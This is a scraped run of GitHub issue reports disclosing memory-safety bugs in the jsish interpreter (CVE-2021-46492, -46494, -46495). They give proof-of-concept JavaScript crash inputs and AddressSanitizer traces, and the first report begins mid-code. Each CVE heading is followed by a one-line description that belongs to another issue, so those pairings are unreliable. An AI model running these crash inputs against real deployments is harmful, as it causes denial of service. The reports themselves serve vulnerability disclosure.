    var buf \= setInterval(function () {
            ws.send('0');
        }, 40)(update(Object(0)));
}

try {
    JSEtest();
} catch (e) {
    setInterval(Function.prototype, 40);
}

​

**Execution steps & Output**

$ ./jsish/jsish poc.js
==66060==ERROR: AddressSanitizer: heap-use-after-free on address 0x6030000001f0 at pc 0x56055c54b6fc bp 0x7ffc737457e0 sp 0x7ffc737457d0
READ of size 4 at 0x6030000001f0 thread T0
    #0 0x56055c54b6fb in DeleteTreeValue src/jsiObj.c:176
    #1 0x56055c563384 in Jsi\_TreeEntryDelete src/jsiTree.c:636
    #2 0x56055c564f10 in destroy\_node src/jsiTree.c:496
    #3 0x56055c564f10 in destroy\_node src/jsiTree.c:494
    #4 0x56055c564f10 in Jsi\_TreeDelete src/jsiTree.c:515
    #5 0x56055c54d9df in Jsi\_ObjFree src/jsiObj.c:348
    #6 0x56055c54ea0f in Jsi\_ObjDecrRefCount src/jsiObj.c:440
    #7 0x56055c3fd3d1 in ValueFree src/jsiValue.c:178
    #8 0x56055c3fd3d1 in Jsi\_ValueFree src/jsiValue.c:199
    #9 0x56055c3fd6cf in Jsi\_DecrRefCount src/jsiValue.c:52
    #10 0x56055c50d4d4 in Jsi\_EventFree src/jsiCmds.c:204
    #11 0x56055c4234e2 in freeEventTbl src/jsiInterp.c:570
    #12 0x56055c4c58dd in Jsi\_HashClear src/jsiHash.c:507
    #13 0x56055c4c5cd7 in Jsi\_HashDelete src/jsiHash.c:526
    #14 0x56055c43687c in jsiInterpDelete src/jsiInterp.c:1936
    #15 0x56055cc4d047 in jsi\_main src/main.c:49
    #16 0x7f78b6c29bf6 in \_\_libc\_start\_main (/lib/x86\_64-linux-gnu/libc.so.6+0x21bf6)
    #17 0x56055c3dc969 in \_start (/usr/local/bin/jsish+0xe8969)

0x6030000001f0 is located 0 bytes inside of 32-byte region \[0x6030000001f0,0x603000000210)
freed by thread T0 here:
    #0 0x7f78b78987a8 in \_\_interceptor\_free (/usr/lib/x86\_64-linux-gnu/libasan.so.4+0xde7a8)
    #1 0x56055c3fd6cf in Jsi\_DecrRefCount src/jsiValue.c:52

previously allocated by thread T0 here:
    #0 0x7f78b7898d28 in \_\_interceptor\_calloc (/usr/lib/x86\_64-linux-gnu/libasan.so.4+0xded28)
    #1 0x56055c44daa4 in Jsi\_Calloc src/jsiUtils.c:57

SUMMARY: AddressSanitizer: heap-use-after-free src/jsiObj.c:176 in DeleteTreeValue
Shadow bytes around the buggy address:
  0x0c067fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c067fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c067fff8000: fa fa fd fd fd fd fa fa fd fd fd fa fa fa fd fd
  0x0c067fff8010: fd fd fa fa fd fd fd fa fa fa fd fd fd fd fa fa
  0x0c067fff8020: fd fd fd fd fa fa fd fd fd fd fa fa fd fd fd fd
\=>0x0c067fff8030: fa fa fd fd fd fd fa fa fd fd fd fd fa fa\[fd\]fd
  0x0c067fff8040: fd fd fa fa fd fd fd fd fa fa fd fd fd fd fa fa
  0x0c067fff8050: fd fd fd fd fa fa fd fd fd fd fa fa fd fd fd fd
  0x0c067fff8060: fa fa fd fd fd fd fa fa fd fd fd fd fa fa fd fd
  0x0c067fff8070: fd fd fa fa fd fd fd fd fa fa fd fd fd fd fa fa
  0x0c067fff8080: fd fd fd fd fa fa fd fd fd fd fa fa fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
\==66060\==ABORTING

1 participant

![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=52&v=4)

CVE-2021-46495: Heap-use-after-free src/jsiObj.c:176 in DeleteTreeValue · Issue #82 · pcmacdon/jsish

Jsish v3.5.0 was discovered to contain a SEGV vulnerability via Jsi_FunctionInvoke at src/jsiFunc.c. This vulnerability can lead to a Denial of Service (DoS).

**Jsish revision**

Commit: 9fa798e

Version: v3.5.0

**Build platform**

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86\_64)

**Build steps**

export CFLAGS='\-fsanitize=address'
make

**Test case1**

var feedback \= setInterval(Number, update(Object(ch)));
WebSocket(new Object());
update(100)(WebSocket(new Object()));

**Test case2**

function JSEtest()
{
  (arr.reduceRight(Object), 0, '1');
  arguments.callee++;
}

var arr \= new Array(10);
arr\[1\] \= 1;
arr\[2\] \= 2;
arr.forEach(JSEtest);

**Execution steps & Output**

$ ./jsish/jsish poc1.js

ASAN:DEADLYSIGNAL
=================================================================
==82851==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000010 (pc 0x5639ca50c71f bp 0x000000000000 sp 0x7ffc15eedf60 T0)
==82851==The signal is caused by a READ memory access.
==82851==Hint: address points to the zero page.
    #0 0x5639ca50c71e in Jsi\_FunctionInvoke src/jsiFunc.c:786
    #1 0x5639ca626b9d in Jsi\_EventProcess src/jsiCmds.c:292
    #2 0x5639ca6278ef in SysUpdateCmd src/jsiCmds.c:411
    #3 0x5639ca58f818 in jsi\_FuncCallSub src/jsiProto.c:244
    #4 0x5639ca85971a in jsiFunctionSubCall src/jsiEval.c:796
    #5 0x5639ca85971a in jsiEvalFunction src/jsiEval.c:837
    #6 0x5639ca85971a in jsiEvalCodeSub src/jsiEval.c:1264
    #7 0x5639ca86d15e in jsi\_evalcode src/jsiEval.c:2204
    #8 0x5639ca871274 in jsi\_evalStrFile src/jsiEval.c:2665
    #9 0x5639ca56066a in Jsi\_Main src/jsiInterp.c:936
    #10 0x5639cad6503a in jsi\_main src/main.c:47
    #11 0x7fb9a888dbf6 in \_\_libc\_start\_main (/lib/x86\_64-linux-gnu/libc.so.6+0x21bf6)
    #12 0x5639ca4f4969 in \_start (/usr/local/bin/jsish+0xe8969)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV src/jsiFunc.c:786 in Jsi\_FunctionInvoke
==82851==ABORTING

$ ./jsish/jsish poc2.js
ASAN:DEADLYSIGNAL
=================================================================
==62010==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x557c5b2f56b6 bp 0x603000007240 sp 0x7ffce7e9ef60 T0)
==62010==The signal is caused by a READ memory access.
==62010==Hint: address points to the zero page.
    #0 0x557c5b2f56b5 in Jsi\_FunctionInvoke src/jsiFunc.c:785
    #1 0x557c5b3ad784 in jsi\_ArrayForeachCmd src/jsiArray.c:531
    #2 0x557c5b378818 in jsi\_FuncCallSub src/jsiProto.c:244
    #3 0x557c5b64271a in jsiFunctionSubCall src/jsiEval.c:796
    #4 0x557c5b64271a in jsiEvalFunction src/jsiEval.c:837
    #5 0x557c5b64271a in jsiEvalCodeSub src/jsiEval.c:1264
    #6 0x557c5b65615e in jsi\_evalcode src/jsiEval.c:2204
    #7 0x557c5b65a274 in jsi\_evalStrFile src/jsiEval.c:2665
    #8 0x557c5b34966a in Jsi\_Main src/jsiInterp.c:936
    #9 0x557c5bb4e03a in jsi\_main src/main.c:47
    #10 0x7f35df3e6bf6 in \_\_libc\_start\_main (/lib/x86\_64-linux-gnu/libc.so.6+0x21bf6)
    #11 0x557c5b2dd969 in \_start (/usr/local/bin/jsish+0xe8969)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV src/jsiFunc.c:785 in Jsi\_FunctionInvoke

CVE-2021-46492: SEGV src/jsiFunc.c:786 in Jsi_FunctionInvoke · Issue #71 · pcmacdon/jsish

Jsish v3.5.0 was discovered to contain a heap-use-after-free via jsi_ValueLookupBase in src/jsiValue.c. This vulnerability can lead to a Denial of Service (DoS).

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Closed

hope-fly opened this issue

Dec 24, 2021

· 0 comments

**Comments**

![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=88&v=4)

**Jsish revision**

Commit: 9fa798e

Version: v3.5.0

**Build platform**

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86\_64)

**Build steps**

export CFLAGS='\-fsanitize=address'
make

**Test case**

var JSEtest \= function() {};
Function.prototype \= 12;
var obj \= JSEtest.bind({});

​

**Execution steps & Output**

$ ./jsish/jsish poc.js
=================================================================
==50188==ERROR: AddressSanitizer: heap-use-after-free on address 0x603000000228 at pc 0x55ccf1df02ee bp 0x7ffcb1d1b0a0 sp 0x7ffcb1d1b090
READ of size 1 at 0x603000000228 thread T0
    #0 0x55ccf1df02ed in jsi\_ValueLookupBase src/jsiValue.c:980
    #1 0x55ccf1df1175 in jsi\_ValueLookupBase src/jsiValue.c:1007
    #2 0x55ccf1df1175 in jsi\_ValueSubscript src/jsiValue.c:1016
    #3 0x55ccf211ad47 in jsiEvalSubscript src/jsiEval.c:997
    #4 0x55ccf211ad47 in jsiEvalCodeSub src/jsiEval.c:1283
    #5 0x55ccf213315e in jsi\_evalcode src/jsiEval.c:2204
    #6 0x55ccf2137274 in jsi\_evalStrFile src/jsiEval.c:2665
    #7 0x55ccf1e2666a in Jsi\_Main src/jsiInterp.c:936
    #8 0x55ccf262b03a in jsi\_main src/main.c:47
    #9 0x7fc99b738bf6 in \_\_libc\_start\_main (/lib/x86\_64-linux-gnu/libc.so.6+0x21bf6)
    #10 0x55ccf1dba969 in \_start (/usr/local/bin/jsish+0xe8969)

0x603000000228 is located 8 bytes inside of 32-byte region \[0x603000000220,0x603000000240)
freed by thread T0 here:
    #0 0x7fc99c3a77a8 in \_\_interceptor\_free (/usr/lib/x86\_64-linux-gnu/libasan.so.4+0xde7a8)
    #1 0x55ccf1ddb6cf in Jsi\_DecrRefCount src/jsiValue.c:52

previously allocated by thread T0 here:
    #0 0x7fc99c3a7d28 in \_\_interceptor\_calloc (/usr/lib/x86\_64-linux-gnu/libasan.so.4+0xded28)
    #1 0x55ccf1e2baa4 in Jsi\_Calloc src/jsiUtils.c:57

SUMMARY: AddressSanitizer: heap-use-after-free src/jsiValue.c:980 in jsi\_ValueLookupBase
Shadow bytes around the buggy address:
  0x0c067fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c067fff8000: fa fa 00 00 00 00 fa fa 00 00 07 fa fa fa 00 00
  0x0c067fff8010: 00 00 fa fa 00 00 03 fa fa fa 00 00 00 00 fa fa
  0x0c067fff8020: 00 00 00 00 fa fa 00 00 00 00 fa fa 00 00 00 00
  0x0c067fff8030: fa fa 00 00 00 00 fa fa 00 00 00 00 fa fa 00 00
\=>0x0c067fff8040: 00 00 fa fa fd\[fd\]fd fd fa fa 00 00 00 00 fa fa
  0x0c067fff8050: 00 00 00 00 fa fa 00 00 00 00 fa fa 00 00 00 00
  0x0c067fff8060: fa fa 00 00 00 00 fa fa 00 00 00 00 fa fa 00 00
  0x0c067fff8070: 00 00 fa fa 00 00 00 00 fa fa 00 00 00 00 fa fa
  0x0c067fff8080: 00 00 00 00 fa fa 00 00 00 00 fa fa 00 00 00 00
  0x0c067fff8090: fa fa 00 00 00 00 fa fa 00 00 00 00 fa fa 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
\==50188\==ABORTING

Credits: Found by OWL337 team.

1 participant

![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=52&v=4)

CVE-2021-46494: Heap-use-after-free src/jsiValue.c:980 in jsi_ValueLookupBase · Issue #78 · pcmacdon/jsish

Jsish v3.5.0 was discovered to contain a heap-use-after-free via /usr/lib/x86_64-linux-gnu/libasan.so.4+0x5166d. This vulnerability can lead to a Denial of Service (DoS).

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Closed

hope-fly opened this issue

Dec 24, 2021

· 0 comments

**Comments**

![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=88&v=4)

**Jsish revision**

Commit: 9fa798e

Version: v3.5.0

**Build platform**

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86\_64)

**Build steps**

export CFLAGS='\-fsanitize=address'
make

**Test case**

var x \= 3;
if (("ab".replace("b", "ab".constructor).replace("b", "ab".constructor)!=="aa") || (x!==undefined)) {
        throw "Err-value!";
}

​

**Execution steps & Output**

$ ./jsish/jsish poc.js
=====ERROR: AddressSanitizer: heap-use-after-free on address 0x602000001cf3 at pc 0x7fae379c366e bp 0x7ffdcb94e5a0 sp 0x7ffdcb94dd48
READ of size 2 at 0x602000001cf3 thread T0
    #0 0x7fae379c366d  (/usr/lib/x86\_64-linux-gnu/libasan.so.4+0x5166d)
    #1 0x55927a403f60 in Jsi\_Strlen src/jsiChar.c:29
    #2 0x55927a508a57 in Jsi\_DSAppendLen src/jsiDString.c:99
    #3 0x55927a508e7f in Jsi\_DSAppend src/jsiDString.c:129
    #4 0x55927a40d4b8 in StringReplaceCmd src/jsiString.c:705
    #5 0x55927a3ed818 in jsi\_FuncCallSub src/jsiProto.c:244
    #6 0x55927a6b771a in jsiFunctionSubCall src/jsiEval.c:796
    #7 0x55927a6b771a in jsiEvalFunction src/jsiEval.c:837
    #8 0x55927a6b771a in jsiEvalCodeSub src/jsiEval.c:1264
    #9 0x55927a6cb15e in jsi\_evalcode src/jsiEval.c:2204
    #10 0x55927a6cf274 in jsi\_evalStrFile src/jsiEval.c:2665
    #11 0x55927a3be66a in Jsi\_Main src/jsiInterp.c:936
    #12 0x55927abc303a in jsi\_main src/main.c:47
    #13 0x7fae36de1bf6 in \_\_libc\_start\_main (/lib/x86\_64-linux-gnu/libc.so.6+0x21bf6)
    #14 0x55927a352969 in \_start (/usr/local/bin/jsish+0xe8969)

0x602000001cf4 is located 0 bytes to the right of 4-byte region \[0x602000001cf0,0x602000001cf4)
freed by thread T0 here:
    #0 0x7fae37a507a8 in \_\_interceptor\_free (/usr/lib/x86\_64-linux-gnu/libasan.so.4+0xde7a8)
    #1 0x55927a412c19 in StringConstructor src/jsiString.c:33

previously allocated by thread T0 here:
    #0 0x7fae37a50b40 in \_\_interceptor\_malloc (/usr/lib/x86\_64-linux-gnu/libasan.so.4+0xdeb40)
    #1 0x55927a3c3a22 in Jsi\_Malloc src/jsiUtils.c:52

SUMMARY: AddressSanitizer: heap-use-after-free (/usr/lib/x86\_64-linux-gnu/libasan.so.4+0x5166d)
Shadow bytes around the buggy address:
  0x0c047fff8340: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd
  0x0c047fff8350: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd
  0x0c047fff8360: fa fa fd fd fa fa fd fd fa fa 07 fa fa fa fd fd
  0x0c047fff8370: fa fa 00 07 fa fa 00 fa fa fa 00 00 fa fa 00 00
  0x0c047fff8380: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 00
\=>0x0c047fff8390: fa fa 00 00 fa fa fd fa fa fa fd fa fa fa\[fd\]fa
  0x0c047fff83a0: fa fa fd fa fa fa 04 fa fa fa fa fa fa fa fa fa
  0x0c047fff83b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff83c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff83d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff83e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb

1 participant

![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=52&v=4)

Tag

#ubuntu